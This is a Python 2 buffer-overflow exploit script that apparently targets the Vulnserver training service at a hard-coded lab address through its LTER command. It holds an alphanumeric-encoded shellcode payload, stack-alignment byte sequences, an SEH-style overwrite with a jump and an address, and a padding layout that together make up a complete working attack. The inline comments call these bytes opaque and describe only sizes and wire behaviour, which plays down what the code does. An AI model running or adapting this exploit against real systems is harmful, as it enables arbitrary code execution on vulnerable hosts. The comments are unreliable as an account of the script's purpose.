#!/usr/bin/python
# Python 2 script (print statements; str doubles as a byte buffer). It builds
# one fixed-layout "LTER" request and sends it to a hard-coded lab address.
# Nothing in this file states what the opaque byte strings below encode, so
# they are documented here only by their lengths and positions in the layout.
import socket
import os   # unused in this file
import sys  # unused in this file
# Opaque byte string: 54 chunks of 13 escaped bytes (702 bytes). The padding
# arithmetic on the `buffer` line below only works while len(buf) <= 3392;
# nothing checks that.
buf = ""
buf += "\x53\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
buf += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30"
buf += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
buf += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
buf += "\x79\x6c\x6b\x58\x4c\x42\x53\x30\x47\x70\x47\x70\x73"
buf += "\x50\x4c\x49\x39\x75\x46\x51\x69\x50\x71\x74\x4c\x4b"
buf += "\x32\x70\x74\x70\x4c\x4b\x66\x32\x46\x6c\x4e\x6b\x33"
buf += "\x62\x45\x44\x6c\x4b\x74\x32\x66\x48\x74\x4f\x68\x37"
buf += "\x43\x7a\x44\x66\x65\x61\x39\x6f\x4c\x6c\x35\x6c\x75"
buf += "\x31\x33\x4c\x75\x52\x54\x6c\x51\x30\x69\x51\x38\x4f"
buf += "\x46\x6d\x56\x61\x39\x57\x5a\x42\x58\x72\x72\x72\x46"
buf += "\x37\x4e\x6b\x76\x32\x42\x30\x6e\x6b\x30\x4a\x57\x4c"
buf += "\x6e\x6b\x72\x6c\x66\x71\x53\x48\x4a\x43\x63\x78\x75"
buf += "\x51\x6e\x31\x62\x71\x4c\x4b\x56\x39\x67\x50\x55\x51"
buf += "\x49\x43\x6e\x6b\x52\x69\x35\x48\x49\x73\x54\x7a\x71"
buf += "\x59\x4e\x6b\x74\x74\x6c\x4b\x46\x61\x6b\x66\x54\x71"
buf += "\x49\x6f\x6c\x6c\x6f\x31\x68\x4f\x34\x4d\x46\x61\x58"
buf += "\x47\x56\x58\x39\x70\x52\x55\x58\x76\x64\x43\x71\x6d"
buf += "\x6a\x58\x77\x4b\x51\x6d\x66\x44\x71\x65\x79\x74\x31"
buf += "\x48\x4e\x6b\x61\x48\x54\x64\x63\x31\x4e\x33\x33\x56"
buf += "\x6e\x6b\x66\x6c\x52\x6b\x6c\x4b\x71\x48\x35\x4c\x47"
buf += "\x71\x6a\x73\x4c\x4b\x35\x54\x4c\x4b\x37\x71\x7a\x70"
buf += "\x4b\x39\x43\x74\x64\x64\x57\x54\x33\x6b\x71\x4b\x51"
buf += "\x71\x62\x79\x52\x7a\x46\x31\x4b\x4f\x4b\x50\x51\x4f"
buf += "\x73\x6f\x51\x4a\x4c\x4b\x45\x42\x6a\x4b\x4c\x4d\x61"
buf += "\x4d\x71\x78\x46\x53\x35\x62\x37\x70\x35\x50\x30\x68"
buf += "\x50\x77\x73\x43\x76\x52\x63\x6f\x46\x34\x42\x48\x42"
buf += "\x6c\x32\x57\x71\x36\x47\x77\x6b\x4f\x79\x45\x58\x38"
buf += "\x4e\x70\x55\x51\x63\x30\x53\x30\x77\x59\x4a\x64\x71"
buf += "\x44\x56\x30\x43\x58\x65\x79\x6d\x50\x42\x4b\x55\x50"
buf += "\x39\x6f\x4a\x75\x76\x30\x76\x30\x30\x50\x50\x50\x63"
buf += "\x70\x62\x70\x33\x70\x50\x50\x75\x38\x49\x7a\x76\x6f"
buf += "\x4b\x6f\x4b\x50\x49\x6f\x78\x55\x4e\x77\x61\x7a\x34"
buf += "\x45\x31\x78\x4f\x30\x4f\x58\x69\x4e\x4c\x45\x52\x48"
buf += "\x33\x32\x35\x50\x77\x61\x33\x6c\x4c\x49\x7a\x46\x71"
buf += "\x7a\x76\x70\x66\x36\x52\x77\x63\x58\x6a\x39\x4e\x45"
buf += "\x31\x64\x51\x71\x49\x6f\x79\x45\x6c\x45\x79\x50\x34"
buf += "\x34\x54\x4c\x79\x6f\x30\x4e\x64\x48\x51\x65\x58\x6c"
buf += "\x32\x48\x6a\x50\x4c\x75\x6e\x42\x50\x56\x79\x6f\x59"
buf += "\x45\x75\x38\x53\x53\x42\x4d\x72\x44\x37\x70\x6b\x39"
buf += "\x4d\x33\x62\x77\x32\x77\x33\x67\x56\x51\x39\x66\x73"
buf += "\x5a\x42\x32\x73\x69\x71\x46\x68\x62\x49\x6d\x71\x76"
buf += "\x6a\x67\x57\x34\x45\x74\x67\x4c\x47\x71\x45\x51\x4e"
buf += "\x6d\x37\x34\x46\x44\x66\x70\x79\x56\x57\x70\x47\x34"
buf += "\x53\x64\x36\x30\x76\x36\x70\x56\x46\x36\x42\x66\x36"
buf += "\x36\x32\x6e\x53\x66\x46\x36\x31\x43\x66\x36\x53\x58"
buf += "\x70\x79\x68\x4c\x77\x4f\x4e\x66\x39\x6f\x7a\x75\x6f"
buf += "\x79\x39\x70\x32\x6e\x73\x66\x33\x76\x6b\x4f\x74\x70"
buf += "\x61\x78\x44\x48\x4d\x57\x37\x6d\x61\x70\x59\x6f\x79"
buf += "\x45\x4f\x4b\x58\x70\x4f\x45\x69\x32\x56\x36\x55\x38"
buf += "\x59\x36\x4d\x45\x6f\x4d\x4f\x6d\x59\x6f\x69\x45\x35"
buf += "\x6c\x35\x56\x53\x4c\x76\x6a\x6f\x70\x39\x6b\x79\x70"
buf += "\x61\x65\x67\x75\x6d\x6b\x77\x37\x62\x33\x30\x72\x32"
buf += "\x4f\x51\x7a\x47\x70\x73\x63\x6b\x4f\x49\x45\x41\x41"
# Short fixed byte strings. The names are the author's; what they encode is
# not established anywhere in this file. zero_eax is reused twice inside
# align_ebx, and magic is the concatenation of the two.
align_esp = "\x5b\x5f\x5c"
zero_eax = "\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A"
align_ebx = zero_eax + "\x2D\x55\x55\x55\x5E\x2D\x55\x55\x55\x5E\x2D\x56\x55\x56\x5F" + "\x50"
align_ebx += zero_eax + "\x2D\x2A\x69\x5C\x54\x2D\x2A\x69\x5C\x54\x2D\x2B\x6A\x5C\x54" + "\x50"
magic = align_esp + align_ebx
# Printed so a reader can eyeball that len(magic) fits the 126-byte slot on
# the next line. NOTE(review): nothing enforces it -- if len(magic) > 126 the
# "\x46" padding evaluates to "" and every later field shifts silently.
print "magic length = " + str(len(magic))
# Request body layout, left to right (sizes follow from the arithmetic and are
# not checked at runtime):
#   "." (1) | buf + "A" pad (3518 - 126 = 3392) | magic + "\x46" pad (126)
#   | "\x73\xffBB" (4) | "\x2b\x17\x50\x62" (4) | "D" * (5000 - 3522 - 4 = 1474)
# That sums to 5001 bytes, one more than the 5000 the last term names,
# because the leading "." is not accounted for -- presumably intentional,
# confirm. Note that `buffer` shadows a Python 2 builtin.
buffer = "." + buf + "A" * (3518 - 126 - len(buf)) + magic + "\x46" * (126 - len(magic)) + "\x73\xffBB" + "\x2b\x17\x50\x62" + "D" * (5000 - 3522 - 4)
# Plain blocking TCP client: address and port are hard-coded, no timeout is
# set, and no error handling wraps connect()/send()/recv() -- an unreachable
# host surfaces as an uncaught socket.error traceback.
expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
expl.connect(("192.168.222.129", 9999))
print expl.recv(1024)   # whatever the service sends first, at most 1024 bytes
# One "LTER" command of ~5 KB followed by CRLF; on the wire this is a single
# oversized command line, which is the observable the server side would see.
expl.send("LTER " + buffer + "\r\n")
print expl.recv(1024)   # response to the LTER command, at most 1024 bytes
expl.send('EXIT\r\n')
expl.close()
# Dumps the raw (unescaped) 5001-byte request body to stdout.
print buffer